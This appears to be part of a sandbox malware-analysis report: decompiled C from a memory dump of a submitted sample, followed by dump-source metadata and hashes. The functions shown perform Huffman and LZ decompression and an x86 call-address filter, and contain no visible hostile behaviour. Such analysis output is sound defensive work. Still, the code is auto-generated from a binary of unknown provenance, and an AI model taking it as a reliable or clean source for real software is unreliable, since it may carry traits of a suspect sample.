                                                    				void* _t358;
                                                    				signed int _t361;
                                                    				signed int _t362;
                                                    				void* _t365;
                                                    				signed int _t368;
                                                    				signed int _t369;
                                                    				intOrPtr* _t371;
                                                    				void* _t372;
                                                    				signed int* _t376;
                                                    				signed int _t379;
                                                    				unsigned int _t382;
                                                    				signed int _t383;
                                                    				void* _t384;
                                                    				signed int _t387;
                                                    				void* _t390;
                                                    				unsigned int _t393;
                                                    				signed int _t394;
                                                    				unsigned int _t397;
                                                    				void* _t399;
                                                    				signed int _t402;
                                                    				intOrPtr* _t404;
                                                    				void* _t405;
                                                    				signed int _t408;
                                                    				void* _t411;
                                                    				signed int _t415;
                                                    				signed int _t416;
                                                    				intOrPtr* _t418;
                                                    				void* _t419;
                                                    				void* _t422;
                                                    				signed int _t425;
                                                    				intOrPtr* _t429;
                                                    				void* _t430;
                                                    				signed int* _t436;
                                                    				unsigned int _t438;
                                                    				unsigned int _t442;
                                                    				signed int _t445;
                                                    				signed int _t447;
                                                    				signed int _t448;
                                                    				signed int _t449;
                                                    				unsigned int _t451;
                                                    				unsigned int _t455;
                                                    				signed int _t458;
                                                    				unsigned int _t459;
                                                    				signed int _t461;
                                                    				signed int _t462;
                                                    				void* _t463;
                                                    				signed int _t464;
                                                    				signed int* _t465;
                                                    				signed char _t466;
                                                    				signed int* _t468;
                                                    				signed int* _t470;
                                                    				signed int _t473;
                                                    				signed int _t474;
                                                    				signed int _t475;
                                                    				signed int _t477;
                                                    				void* _t479;
                                                    
                                                    				_t466 =  *(_t479 + 0x44);
                                                    				 *(_t479 + 0x30) = __ecx;
                                                    				_t321 = _t466 + 0x18;
                                                    				_t465 = _t466 + 4;
                                                    				if( *((char*)(_t466 + 0x2c)) != 0) {
                                                    					L2:
                                                    					_t344 =  *_t321;
                                                    					_t220 =  *((intOrPtr*)(_t466 + 0x24)) + _t344;
                                                    					if( *_t465 <= _t220) {
                                                    						 *(_t466 + 0x4ad8) =  *(_t466 + 0x4ad8) & 0x00000000;
                                                    						_t223 =  *((intOrPtr*)(_t466 + 0x20)) - 1 + _t344;
                                                    						_t436 =  *((intOrPtr*)(_t466 + 0x4acc)) - 0x10;
                                                    						 *(_t479 + 0x1c) = _t223;
                                                    						 *(_t479 + 0x18) = _t436;
                                                    						__eflags = _t223 - _t436;
                                                    						if(_t223 >= _t436) {
                                                    							_t468 = _t436;
                                                    							 *(_t479 + 0x14) = _t436;
                                                    						} else {
                                                    							_t468 = _t223;
                                                    							 *(_t479 + 0x14) = _t468;
                                                    						}
                                                    						_t322 = _t466 + 0x4ad4;
                                                    						while(1) {
                                                    							_t345 =  *_t465;
                                                    							 *(_t479 + 0x10) = _t322;
                                                    							__eflags = _t345 - _t468;
                                                    							if(_t345 < _t468) {
                                                    								goto L15;
                                                    							}
                                                    							__eflags = _t345 - _t223;
                                                    							if(__eflags > 0) {
                                                    								L93:
                                                    								return _t223;
                                                    							}
                                                    							if(__eflags != 0) {
                                                    								L12:
                                                    								__eflags = _t345 - _t436;
                                                    								if(_t345 < _t436) {
                                                    									L14:
                                                    									_t223 = _t466 + 0x4ad4;
                                                    									_t322 = _t223;
                                                    									 *(_t479 + 0x10) = _t223;
                                                    									__eflags = _t345 -  *((intOrPtr*)(_t466 + 0x4acc));
                                                    									if(_t345 >=  *((intOrPtr*)(_t466 + 0x4acc))) {
                                                    										L92:
                                                    										 *((char*)(_t466 + 0x4ad3)) = 1;
                                                    										goto L93;
                                                    									}
                                                    									goto L15;
                                                    								}
                                                    								__eflags =  *((char*)(_t466 + 0x4ad2));
                                                    								if( *((char*)(_t466 + 0x4ad2)) == 0) {
                                                    									goto L92;
                                                    								}
                                                    								goto L14;
                                                    							}
                                                    							_t223 =  *(_t466 + 8);
                                                    							__eflags = _t223 -  *((intOrPtr*)(_t466 + 0x1c));
                                                    							if(_t223 >=  *((intOrPtr*)(_t466 + 0x1c))) {
                                                    								goto L93;
                                                    							}
                                                    							goto L12;
                                                    							L15:
                                                    							_t346 =  *(_t466 + 0x4adc);
                                                    							__eflags =  *(_t466 + 0x4ad8) - _t346 - 8;
                                                    							if( *(_t466 + 0x4ad8) > _t346 - 8) {
                                                    								_t316 = _t346 + _t346;
                                                    								 *(_t466 + 0x4adc) = _t316;
                                                    								_push(_t316 * 0xc);
                                                    								_push( *_t322);
                                                    								_t477 = E00CE3E3E(_t346, _t436);
                                                    								__eflags = _t477;
                                                    								if(_t477 == 0) {
                                                    									E00CC6CA7(0xd01098);
                                                    								}
                                                    								 *_t322 = _t477;
                                                    							}
                                                    							_t225 =  *(_t466 + 0x4ad8);
                                                    							_t470 = _t225 * 0xc +  *_t322;
                                                    							 *(_t479 + 0x2c) = _t470;
                                                    							 *(_t466 + 0x4ad8) = _t225 + 1;
                                                    							_t227 = E00CCA89D(_t465);
                                                    							_t228 =  *(_t466 + 0xb4);
                                                    							_t438 = _t227 & 0x0000fffe;
                                                    							__eflags = _t438 -  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4));
                                                    							if(_t438 >=  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4))) {
                                                    								_t348 = 0xf;
                                                    								_t229 = _t228 + 1;
                                                    								 *(_t479 + 0x28) = _t348;
                                                    								__eflags = _t229 - _t348;
                                                    								if(_t229 >= _t348) {
                                                    									L27:
                                                    									_t324 = _t465[1] + _t348;
                                                    									_t325 = _t324 & 0x00000007;
                                                    									 *_t465 =  *_t465 + (_t324 >> 3);
                                                    									 *(_t479 + 0x18) =  *_t465;
                                                    									_t233 =  *(_t479 + 0x28);
                                                    									_t465[1] = _t325;
                                                    									_t349 = 0x10;
                                                    									_t352 =  *((intOrPtr*)(_t466 + 0x74 + _t233 * 4)) + (_t438 -  *((intOrPtr*)(_t466 + 0x30 + _t233 * 4)) >> _t349 - _t233);
                                                    									__eflags = _t352 -  *((intOrPtr*)(_t466 + 0x30));
                                                    									asm("sbb eax, eax");
                                                    									_t234 = _t233 & _t352;
                                                    									__eflags = _t234;
                                                    									_t235 =  *(_t466 + 0xcb8 + _t234 * 2) & 0x0000ffff;
                                                    									goto L28;
                                                    								}
                                                    								_t429 = _t466 + 0x34 + _t229 * 4;
                                                    								while(1) {
                                                    									__eflags = _t438 -  *_t429;
                                                    									if(_t438 <  *_t429) {
                                                    										break;
                                                    									}
                                                    									_t229 = _t229 + 1;
                                                    									_t429 = _t429 + 4;
                                                    									__eflags = _t229 - 0xf;
                                                    									if(_t229 < 0xf) {
                                                    										continue;
                                                    									}
                                                    									_t348 =  *(_t479 + 0x28);
                                                    									goto L27;
                                                    								}
                                                    								_t348 = _t229;
                                                    								 *(_t479 + 0x28) = _t229;
                                                    								goto L27;
                                                    							} else {
                                                    								_t430 = 0x10;
                                                    								_t464 = _t438 >> _t430 - _t228;
                                                    								_t342 = ( *(_t464 + _t466 + 0xb8) & 0x000000ff) + _t465[1];
                                                    								 *_t465 =  *_t465 + (_t342 >> 3);
                                                    								_t325 = _t342 & 0x00000007;
                                                    								 *(_t479 + 0x18) =  *_t465;
                                                    								_t465[1] = _t325;
                                                    								_t235 =  *(_t466 + 0x4b8 + _t464 * 2) & 0x0000ffff;
                                                    								L28:
                                                    								_t353 = _t235 & 0x0000ffff;
                                                    								__eflags = _t353 - 0x100;
                                                    								if(_t353 >= 0x100) {
                                                    									__eflags = _t353 - 0x106;
                                                    									if(_t353 < 0x106) {
                                                    										__eflags = _t353 - 0x100;
                                                    										if(_t353 != 0x100) {
                                                    											__eflags = _t353 - 0x101;
                                                    											if(_t353 != 0x101) {
                                                    												_t237 = 3;
                                                    												 *_t470 = _t237;
                                                    												_t470[2] = _t353 - 0x102;
                                                    												_t239 = E00CCA89D(_t465);
                                                    												_t240 =  *(_t466 + 0x2d78);
                                                    												_t442 = _t239 & 0x0000fffe;
                                                    												__eflags = _t442 -  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4));
                                                    												if(_t442 >=  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4))) {
                                                    													_t326 = 0xf;
                                                    													_t241 = _t240 + 1;
                                                    													__eflags = _t241 - _t326;
                                                    													if(_t241 >= _t326) {
                                                    														L86:
                                                    														_t356 = _t465[1] + _t326;
                                                    														_t357 = _t356 & 0x00000007;
                                                    														_t465[1] = _t357;
                                                    														_t243 = _t356 >> 3;
                                                    														 *_t465 =  *_t465 + _t243;
                                                    														 *(_t479 + 0x30) = _t357;
                                                    														_t358 = 0x10;
                                                    														_t361 =  *((intOrPtr*)(_t466 + 0x2d38 + _t326 * 4)) + (_t442 -  *((intOrPtr*)(_t466 + 0x2cf4 + _t326 * 4)) >> _t358 - _t326);
                                                    														__eflags = _t361 -  *((intOrPtr*)(_t466 + 0x2cf4));
                                                    														asm("sbb eax, eax");
                                                    														_t244 = _t243 & _t361;
                                                    														__eflags = _t244;
                                                    														_t245 =  *(_t466 + 0x397c + _t244 * 2) & 0x0000ffff;
                                                    														L87:
                                                    														_t246 = _t245 & 0x0000ffff;
                                                    														__eflags = _t246 - 8;
                                                    														if(_t246 >= 8) {
                                                    															_t362 = 3;
                                                    															_t329 = (_t246 >> 2) - 1;
                                                    															_t445 = ((_t246 & _t362 | 0x00000004) << _t329) + 2;
                                                    															 *(_t479 + 0x2c) = _t445;
                                                    															__eflags = _t329;
                                                    															if(_t329 != 0) {
                                                    																_t250 = E00CCA89D(_t465);
                                                    																_t365 = 0x10;
                                                    																_t445 =  *(_t479 + 0x2c) + (_t250 >> _t365 - _t329);
                                                    																_t368 =  *(_t479 + 0x30) + _t329;
                                                    																 *_t465 =  *_t465 + (_t368 >> 3);
                                                    																_t369 = _t368 & 0x00000007;
                                                    																__eflags = _t369;
                                                    																_t465[1] = _t369;
                                                    															}
                                                    														} else {
                                                    															_t445 = _t246 + 2;
                                                    														}
                                                    														_t470[1] = _t445;
                                                    														L33:
                                                    														_t322 =  *(_t479 + 0x10);
                                                    														L34:
                                                    														_t436 =  *(_t479 + 0x1c);
                                                    														_t223 =  *(_t479 + 0x20);
                                                    														_t468 =  *(_t479 + 0x14);
                                                    														continue;
                                                    													}
                                                    													_t371 = _t466 + 0x2cf8 + _t241 * 4;
                                                    													while(1) {
                                                    														__eflags = _t442 -  *_t371;
                                                    														if(_t442 <  *_t371) {
                                                    															break;
                                                    														}
                                                    														_t241 = _t241 + 1;
                                                    														_t371 = _t371 + 4;
                                                    														__eflags = _t241 - 0xf;
                                                    														if(_t241 < 0xf) {
                                                    															continue;
                                                    														}
                                                    														goto L86;
                                                    													}
                                                    													_t326 = _t241;
                                                    													goto L86;
                                                    												}
                                                    												_t372 = 0x10;
                                                    												_t447 = _t442 >> _t372 - _t240;
                                                    												_t331 = ( *(_t447 + _t466 + 0x2d7c) & 0x000000ff) + _t465[1];
                                                    												 *_t465 =  *_t465 + (_t331 >> 3);
                                                    												_t332 = _t331 & 0x00000007;
                                                    												_t465[1] = _t332;
                                                    												_t245 =  *(_t466 + 0x317c + _t447 * 2) & 0x0000ffff;
                                                    												 *(_t479 + 0x30) = _t332;
                                                    												goto L87;
                                                    											}
                                                    											 *_t470 = 2;
                                                    											goto L33;
                                                    										}
                                                    										_push(_t479 + 0x38);
                                                    										E00CD3F9D( *((intOrPtr*)(_t479 + 0x34)), _t465);
                                                    										_t322 =  *(_t479 + 0x10);
                                                    										_t470[1] =  *(_t479 + 0x38) & 0x000000ff;
                                                    										_t470[2] =  *(_t479 + 0x3c);
                                                    										_t448 = 4;
                                                    										 *_t470 = _t448;
                                                    										_t260 =  *(_t466 + 0x4ad8);
                                                    										_t376 = _t260 * 0xc +  *_t322;
                                                    										 *(_t466 + 0x4ad8) = _t260 + 1;
                                                    										_t376[1] =  *(_t479 + 0x44) & 0x000000ff;
                                                    										 *_t376 = _t448;
                                                    										_t376[2] =  *(_t479 + 0x40);
                                                    										goto L34;
                                                    									}
                                                    									_t264 = _t353 - 0x106;
                                                    									__eflags = _t264 - 8;
                                                    									if(_t264 >= 8) {
                                                    										_t449 = 3;
                                                    										_t379 = (_t264 >> 2) - 1;
                                                    										 *(_t479 + 0x30) = _t379;
                                                    										 *(_t479 + 0x24) = ((_t264 & _t449 | 0x00000004) << _t379) + 2;
                                                    										__eflags = _t379;
                                                    										if(_t379 != 0) {
                                                    											_t305 = E00CCA89D(_t465);
                                                    											_t340 = _t325 +  *(_t479 + 0x30);
                                                    											_t422 = 0x10;
                                                    											 *(_t479 + 0x24) =  *(_t479 + 0x24) + (_t305 >> _t422 -  *(_t479 + 0x30));
                                                    											_t425 =  *(_t479 + 0x18) + (_t340 >> 3);
                                                    											_t325 = _t340 & 0x00000007;
                                                    											__eflags = _t325;
                                                    											 *(_t479 + 0x18) = _t425;
                                                    											 *_t465 = _t425;
                                                    											_t465[1] = _t325;
                                                    										}
                                                    									} else {
                                                    										 *(_t479 + 0x24) = _t264 + 2;
                                                    									}
                                                    									_t269 = E00CCA89D(_t465);
                                                    									_t270 =  *(_t466 + 0xfa0);
                                                    									_t451 = _t269 & 0x0000fffe;
                                                    									__eflags = _t451 -  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4));
                                                    									if(_t451 >=  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4))) {
                                                    										_t333 = 0xf;
                                                    										_t271 = _t270 + 1;
                                                    										__eflags = _t271 - _t333;
                                                    										if(_t271 >= _t333) {
                                                    											L49:
                                                    											_t382 = _t465[1] + _t333;
                                                    											_t383 = _t382 & 0x00000007;
                                                    											_t465[1] = _t383;
                                                    											 *_t465 =  *_t465 + (_t382 >> 3);
                                                    											_t274 =  *_t465;
                                                    											 *(_t479 + 0x18) = _t383;
                                                    											_t384 = 0x10;
                                                    											 *(_t479 + 0x28) = _t274;
                                                    											_t387 =  *((intOrPtr*)(_t466 + 0xf60 + _t333 * 4)) + (_t451 -  *((intOrPtr*)(_t466 + 0xf1c + _t333 * 4)) >> _t384 - _t333);
                                                    											__eflags = _t387 -  *((intOrPtr*)(_t466 + 0xf1c));
                                                    											asm("sbb eax, eax");
                                                    											_t275 = _t274 & _t387;
                                                    											__eflags = _t275;
                                                    											_t276 =  *(_t466 + 0x1ba4 + _t275 * 2) & 0x0000ffff;
                                                    											goto L50;
                                                    										}
                                                    										_t418 = _t466 + 0xf20 + _t271 * 4;
                                                    										while(1) {
                                                    											__eflags = _t451 -  *_t418;
                                                    											if(_t451 <  *_t418) {
                                                    												break;
                                                    											}
                                                    											_t271 = _t271 + 1;
                                                    											_t418 = _t418 + 4;
                                                    											__eflags = _t271 - 0xf;
                                                    											if(_t271 < 0xf) {
                                                    												continue;
                                                    											}
                                                    											goto L49;
                                                    										}
                                                    										_t333 = _t271;
                                                    										goto L49;
                                                    									} else {
                                                    										_t419 = 0x10;
                                                    										_t459 = _t451 >> _t419 - _t270;
                                                    										 *(_t479 + 0x30) = _t459;
                                                    										_t461 = ( *(_t459 + _t466 + 0xfa4) & 0x000000ff) + _t325;
                                                    										_t303 = (_t461 >> 3) +  *(_t479 + 0x18);
                                                    										_t462 = _t461 & 0x00000007;
                                                    										 *(_t479 + 0x28) = _t303;
                                                    										 *_t465 = _t303;
                                                    										_t465[1] = _t462;
                                                    										 *(_t479 + 0x18) = _t462;
                                                    										_t276 =  *(_t466 + 0x13a4 +  *(_t479 + 0x30) * 2) & 0x0000ffff;
                                                    										L50:
                                                    										_t277 = _t276 & 0x0000ffff;
                                                    										__eflags = _t277 - 4;
                                                    										if(_t277 >= 4) {
                                                    											_t473 = (_t277 >> 1) - 1;
                                                    											_t281 = ((_t277 & 0x00000001 | 0x00000002) << _t473) + 1;
                                                    											 *(_t479 + 0x30) = _t281;
                                                    											_t334 = _t281;
                                                    											__eflags = _t473;
                                                    											if(_t473 == 0) {
                                                    												L68:
                                                    												_t470 =  *(_t479 + 0x2c);
                                                    												L69:
                                                    												_t282 =  *(_t479 + 0x24);
                                                    												__eflags = _t334 - 0x100;
                                                    												if(_t334 > 0x100) {
                                                    													_t282 = _t282 + 1;
                                                    													__eflags = _t334 - 0x2000;
                                                    													if(_t334 > 0x2000) {
                                                    														_t282 = _t282 + 1;
                                                    														__eflags = _t334 - 0x40000;
                                                    														if(_t334 > 0x40000) {
                                                    															_t282 = _t282 + 1;
                                                    															__eflags = _t282;
                                                    														}
                                                    													}
                                                    												}
                                                    												 *_t470 = 1;
                                                    												_t470[1] = _t282;
                                                    												_t470[2] = _t334;
                                                    												goto L33;
                                                    											}
                                                    											__eflags = _t473 - 4;
                                                    											if(__eflags < 0) {
                                                    												_t283 = E00CD8934(_t465);
                                                    												_t390 = 0x20;
                                                    												_t334 = (_t283 >> _t390 - _t473) +  *(_t479 + 0x30);
                                                    												_t393 =  *(_t479 + 0x18) + _t473;
                                                    												_t394 = _t393 & 0x00000007;
                                                    												__eflags = _t394;
                                                    												 *_t465 = (_t393 >> 3) +  *(_t479 + 0x28);
                                                    												_t465[1] = _t394;
                                                    												goto L68;
                                                    											}
                                                    											if(__eflags <= 0) {
                                                    												_t474 =  *(_t479 + 0x28);
                                                    											} else {
                                                    												_t298 = E00CD8934(_t465);
                                                    												_t411 = 0x24;
                                                    												_t334 = (_t298 >> _t411 - _t473 << 4) +  *(_t479 + 0x30);
                                                    												_t415 =  *(_t479 + 0x18) + 0xfffffffc + _t473;
                                                    												_t474 =  *(_t479 + 0x28) + (_t415 >> 3);
                                                    												_t416 = _t415 & 0x00000007;
                                                    												 *_t465 = _t474;
                                                    												 *(_t479 + 0x18) = _t416;
                                                    												_t465[1] = _t416;
                                                    											}
                                                    											_t287 = E00CCA89D(_t465);
                                                    											_t288 =  *(_t466 + 0x1e8c);
                                                    											_t455 = _t287 & 0x0000fffe;
                                                    											__eflags = _t455 -  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4));
                                                    											if(_t455 >=  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4))) {
                                                    												_t475 = 0xf;
                                                    												_t289 = _t288 + 1;
                                                    												__eflags = _t289 - _t475;
                                                    												if(_t289 >= _t475) {
                                                    													L65:
                                                    													_t397 = _t465[1] + _t475;
                                                    													_t465[1] = _t397 & 0x00000007;
                                                    													_t291 = _t397 >> 3;
                                                    													 *_t465 =  *_t465 + _t291;
                                                    													_t399 = 0x10;
                                                    													_t402 =  *((intOrPtr*)(_t466 + 0x1e4c + _t475 * 4)) + (_t455 -  *((intOrPtr*)(_t466 + 0x1e08 + _t475 * 4)) >> _t399 - _t475);
                                                    													__eflags = _t402 -  *((intOrPtr*)(_t466 + 0x1e08));
                                                    													asm("sbb eax, eax");
                                                    													_t292 = _t291 & _t402;
                                                    													__eflags = _t292;
                                                    													_t293 =  *(_t466 + 0x2a90 + _t292 * 2) & 0x0000ffff;
                                                    													goto L66;
                                                    												}
                                                    												_t404 = _t466 + 0x1e0c + _t289 * 4;
                                                    												while(1) {
                                                    													__eflags = _t455 -  *_t404;
                                                    													if(_t455 <  *_t404) {
                                                    														break;
                                                    													}
                                                    													_t289 = _t289 + 1;
                                                    													_t404 = _t404 + 4;
                                                    													__eflags = _t289 - 0xf;
                                                    													if(_t289 < 0xf) {
                                                    														continue;
                                                    													}
                                                    													goto L65;
                                                    												}
                                                    												_t475 = _t289;
                                                    												goto L65;
                                                    											} else {
                                                    												_t405 = 0x10;
                                                    												_t458 = _t455 >> _t405 - _t288;
                                                    												_t408 = ( *(_t458 + _t466 + 0x1e90) & 0x000000ff) +  *(_t479 + 0x18);
                                                    												 *_t465 = (_t408 >> 3) + _t474;
                                                    												_t465[1] = _t408 & 0x00000007;
                                                    												_t293 =  *(_t466 + 0x2290 + _t458 * 2) & 0x0000ffff;
                                                    												L66:
                                                    												_t334 = _t334 + (_t293 & 0x0000ffff);
                                                    												goto L68;
                                                    											}
                                                    										}
                                                    										_t334 = _t277 + 1;
                                                    										goto L69;
                                                    									}
                                                    								}
                                                    								__eflags =  *(_t466 + 0x4ad8) - 1;
                                                    								if( *(_t466 + 0x4ad8) <= 1) {
                                                    									L35:
                                                    									 *_t470 =  *_t470 & 0x00000000;
                                                    									_t470[2] = _t353;
                                                    									_t470[1] = 0;
                                                    									goto L33;
                                                    								}
                                                    								__eflags =  *(_t470 - 0xc);
                                                    								if( *(_t470 - 0xc) != 0) {
                                                    									goto L35;
                                                    								}
                                                    								_t310 =  *(_t470 - 8) & 0x0000ffff;
                                                    								_t463 = 3;
                                                    								__eflags = _t310 - _t463;
                                                    								if(_t310 >= _t463) {
                                                    									goto L35;
                                                    								}
                                                    								_t311 = _t310 + 1;
                                                    								 *(_t470 - 8) = _t311;
                                                    								 *((_t311 & 0x0000ffff) + _t470 - 4) = _t353;
                                                    								_t72 = _t466 + 0x4ad8;
                                                    								 *_t72 =  *(_t466 + 0x4ad8) - 1;
                                                    								__eflags =  *_t72;
                                                    								goto L33;
                                                    							}
                                                    						}
                                                    					}
                                                    					L3:
                                                    					 *((char*)(_t466 + 0x4ad0)) = 1;
                                                    					return _t220;
                                                    				}
                                                    				 *((char*)(_t466 + 0x2c)) = 1;
                                                    				_push(_t466 + 0x30);
                                                    				_push(_t321);
                                                    				_push(_t465);
                                                    				_t220 = E00CD43BF(__ecx);
                                                    				if(_t220 == 0) {
                                                    					goto L3;
                                                    				}
                                                    				goto L2;
                                                    			}




























































































































                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c92a67ae5353e33460d92115885762a57529239f7ca111212b4f30afe15c673
                                                    • Instruction ID: c93040e91ec02349d0b661d2ba54cdc458eb74571675bb9554b60f212df0dc7c
                                                    • Opcode Fuzzy Hash: 7c92a67ae5353e33460d92115885762a57529239f7ca111212b4f30afe15c673
                                                    • Instruction Fuzzy Hash: 3412D3B16087069FC719CF28C490AB9B7E0FF94304F148A2EEA96C7780E334E995DB45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCC426(signed char** __ecx) {
                                                    				void* __edi;
                                                    				void* _t188;
                                                    				signed int _t189;
                                                    				char _t192;
                                                    				void* _t197;
                                                    				void* _t198;
                                                    				signed int _t201;
                                                    				signed char _t202;
                                                    				void* _t212;
                                                    				signed int _t213;
                                                    				signed int _t215;
                                                    				signed int _t216;
                                                    				signed char* _t217;
                                                    				void* _t218;
                                                    				intOrPtr _t222;
                                                    				signed char* _t225;
                                                    				signed char _t228;
                                                    				void* _t237;
                                                    				void* _t238;
                                                    				signed int _t239;
                                                    				signed int _t242;
                                                    				signed char* _t245;
                                                    				signed int _t277;
                                                    				void* _t278;
                                                    				void* _t279;
                                                    				void* _t280;
                                                    				void* _t281;
                                                    				void* _t282;
                                                    				signed int _t286;
                                                    				intOrPtr _t287;
                                                    				void* _t288;
                                                    				signed char* _t289;
                                                    				void* _t290;
                                                    				signed int _t291;
                                                    				signed int _t292;
                                                    				char _t293;
                                                    				intOrPtr* _t295;
                                                    				signed char _t296;
                                                    				signed int _t301;
                                                    				signed int _t302;
                                                    				intOrPtr _t304;
                                                    				intOrPtr* _t306;
                                                    				signed char* _t307;
                                                    				signed int _t308;
                                                    				signed int _t314;
                                                    				signed int _t316;
                                                    				signed int _t318;
                                                    				signed int _t319;
                                                    				signed char _t320;
                                                    				intOrPtr _t321;
                                                    				intOrPtr _t322;
                                                    				unsigned int _t325;
                                                    				signed int _t326;
                                                    				signed int _t327;
                                                    				signed int _t328;
                                                    				void* _t331;
                                                    				signed char _t332;
                                                    				signed char* _t333;
                                                    				signed char _t335;
                                                    				signed int _t336;
                                                    				signed int _t337;
                                                    				void* _t338;
                                                    				void* _t339;
                                                    				void* _t340;
                                                    				signed int _t343;
                                                    				signed int _t344;
                                                    				signed char* _t345;
                                                    				signed int _t346;
                                                    				signed int _t348;
                                                    				intOrPtr _t350;
                                                    				signed int _t351;
                                                    				signed int _t354;
                                                    				void* _t358;
                                                    				signed int _t359;
                                                    				signed char* _t360;
                                                    				signed int _t361;
                                                    				void* _t362;
                                                    				void* _t363;
                                                    
                                                    				_t349 = __ecx;
                                                    				_t188 =  *((intOrPtr*)(_t363 + 4)) - 1;
                                                    				if(_t188 == 0) {
                                                    					L84:
                                                    					_t189 =  *(_t349 + 0x14);
                                                    					_t295 =  *_t349;
                                                    					_t350 =  *((intOrPtr*)(_t349 + 0x1c));
                                                    					_t288 = _t189 - 4;
                                                    					if(_t288 > 0x3fffc) {
                                                    						L96:
                                                    						return 0;
                                                    					}
                                                    					_t338 = 0;
                                                    					_t192 = (_t189 & 0xffffff00 |  *((intOrPtr*)(_t363 + 0x64)) == 0x00000002) + 0xe8;
                                                    					 *((char*)(_t363 + 0x13)) = _t192;
                                                    					if(_t288 == 0) {
                                                    						L95:
                                                    						return 1;
                                                    					} else {
                                                    						goto L86;
                                                    					}
                                                    					do {
                                                    						L86:
                                                    						_t321 =  *_t295;
                                                    						_t295 = _t295 + 1;
                                                    						_t339 = _t338 + 1;
                                                    						_t350 = _t350 + 1;
                                                    						if(_t321 == 0xe8 || _t321 == _t192) {
                                                    							_t322 =  *_t295;
                                                    							if(_t322 >= 0) {
                                                    								if(_t322 - 0x1000000 < 0) {
                                                    									 *_t295 = _t322 - _t350;
                                                    								}
                                                    							} else {
                                                    								if(_t350 + _t322 >= 0) {
                                                    									 *_t295 = _t322 + 0x1000000;
                                                    								}
                                                    							}
                                                    							_t192 =  *((intOrPtr*)(_t363 + 0x13));
                                                    							_t295 = _t295 + 4;
                                                    							_t338 = _t339 + 4;
                                                    							_t350 = _t350 + 4;
                                                    						}
                                                    					} while (_t338 < _t288);
                                                    					goto L95;
                                                    				}
                                                    				_t197 = _t188 - 1;
                                                    				if(_t197 == 0) {
                                                    					goto L84;
                                                    				}
                                                    				_t198 = _t197 - 1;
                                                    				if(_t198 == 0) {
                                                    					_t289 =  *__ecx;
                                                    					_t340 = __ecx[5] - 0x15;
                                                    					if(_t340 > 0x3ffeb) {
                                                    						goto L96;
                                                    					}
                                                    					_t325 = __ecx[7] >> 4;
                                                    					 *(_t363 + 0x28) = _t325;
                                                    					if(_t340 == 0) {
                                                    						goto L95;
                                                    					}
                                                    					_t343 = (_t340 - 1 >> 4) + 1;
                                                    					 *(_t363 + 0x38) = _t343;
                                                    					do {
                                                    						_t201 =  *_t289 & 0x1f;
                                                    						if(_t201 < 0x10) {
                                                    							goto L82;
                                                    						}
                                                    						_t202 =  *((intOrPtr*)(_t201 + 0xcfe078));
                                                    						if(_t202 == 0) {
                                                    							goto L82;
                                                    						}
                                                    						_t344 =  *(_t363 + 0x28);
                                                    						_t296 = 0;
                                                    						_t326 = _t202 & 0x000000ff;
                                                    						 *(_t363 + 0x30) = 0;
                                                    						 *(_t363 + 0x40) = _t326;
                                                    						_t358 = 0x12;
                                                    						do {
                                                    							if((_t326 & 1) != 0) {
                                                    								_t168 = _t358 + 0x18; // 0x2a
                                                    								if(E00CCC985(_t289, _t168, 4) == 5) {
                                                    									E00CCC9D0(_t289, E00CCC985(_t289, _t358, 0x14) - _t344 & 0x000fffff, _t358, 0x14);
                                                    								}
                                                    								_t326 =  *(_t363 + 0x3c);
                                                    								_t296 =  *(_t363 + 0x2c);
                                                    							}
                                                    							_t296 = _t296 + 1;
                                                    							_t358 = _t358 + 0x29;
                                                    							 *(_t363 + 0x2c) = _t296;
                                                    						} while (_t358 <= 0x64);
                                                    						_t343 =  *(_t363 + 0x38);
                                                    						_t325 =  *(_t363 + 0x28);
                                                    						L82:
                                                    						_t289 =  &(_t289[0x10]);
                                                    						_t325 = _t325 + 1;
                                                    						_t343 = _t343 - 1;
                                                    						 *(_t363 + 0x28) = _t325;
                                                    						 *(_t363 + 0x38) = _t343;
                                                    					} while (_t343 != 0);
                                                    					goto L95;
                                                    				}
                                                    				_t212 = _t198 - 1;
                                                    				if(_t212 == 0) {
                                                    					_t213 = __ecx[1];
                                                    					_t345 = __ecx[5];
                                                    					 *(_t363 + 0x18) = _t213;
                                                    					_t290 = _t213 - 3;
                                                    					if(_t345 - 3 > 0x1fffd || _t290 > _t345) {
                                                    						goto L96;
                                                    					} else {
                                                    						_t215 = __ecx[2];
                                                    						 *(_t363 + 0x20) = _t215;
                                                    						if(_t215 > 2) {
                                                    							goto L96;
                                                    						}
                                                    						_t216 =  *__ecx;
                                                    						 *(_t363 + 0x14) = _t216;
                                                    						_t359 = 3;
                                                    						_t351 =  &(_t345[_t216]);
                                                    						_t217 = 0;
                                                    						 *(_t363 + 0x24) = _t351;
                                                    						_t301 = _t351 - _t290;
                                                    						 *(_t363 + 0x30) = 0;
                                                    						 *(_t363 + 0x28) = _t301;
                                                    						do {
                                                    							_t291 = 0;
                                                    							if(_t217 >= _t345) {
                                                    								goto L65;
                                                    							}
                                                    							_t327 =  *(_t363 + 0x18);
                                                    							_t360 =  &(_t217[_t301]);
                                                    							_t302 =  *(_t363 + 0x14);
                                                    							_t225 =  *(_t363 + 0x18) + 0xfffffffd - _t351;
